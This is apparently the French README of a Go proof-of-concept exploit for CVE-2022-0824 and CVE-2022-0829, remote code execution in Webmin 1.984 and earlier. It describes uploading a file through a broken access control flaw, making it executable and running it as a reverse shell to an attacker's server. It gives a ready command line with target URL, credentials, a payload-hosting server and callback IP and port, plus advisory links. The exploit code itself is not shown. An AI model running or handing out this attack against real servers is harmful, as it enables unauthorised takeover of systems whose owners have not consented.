
POC d'exploitation pour CVE-2022-0824
RCE dans Webmin <= 1.984
CVE-2022-0824 et CVE-2022-0829
Cette faille exploite une vulnérabilité BAC dans Webmin pour téléverser un fichier malveillant, changer les permissions du fichier, et exécuter le fichier. Le fichier, créé dans la fonction makePayload, est un reverse shell vers un serveur contrôlé par l'attaquant.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> URL cible
c -> identifiants pour webmin
sl -> votre IP et port de serveur local pour héberger votre payload
s -> IP de callback
p -> port de callback
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824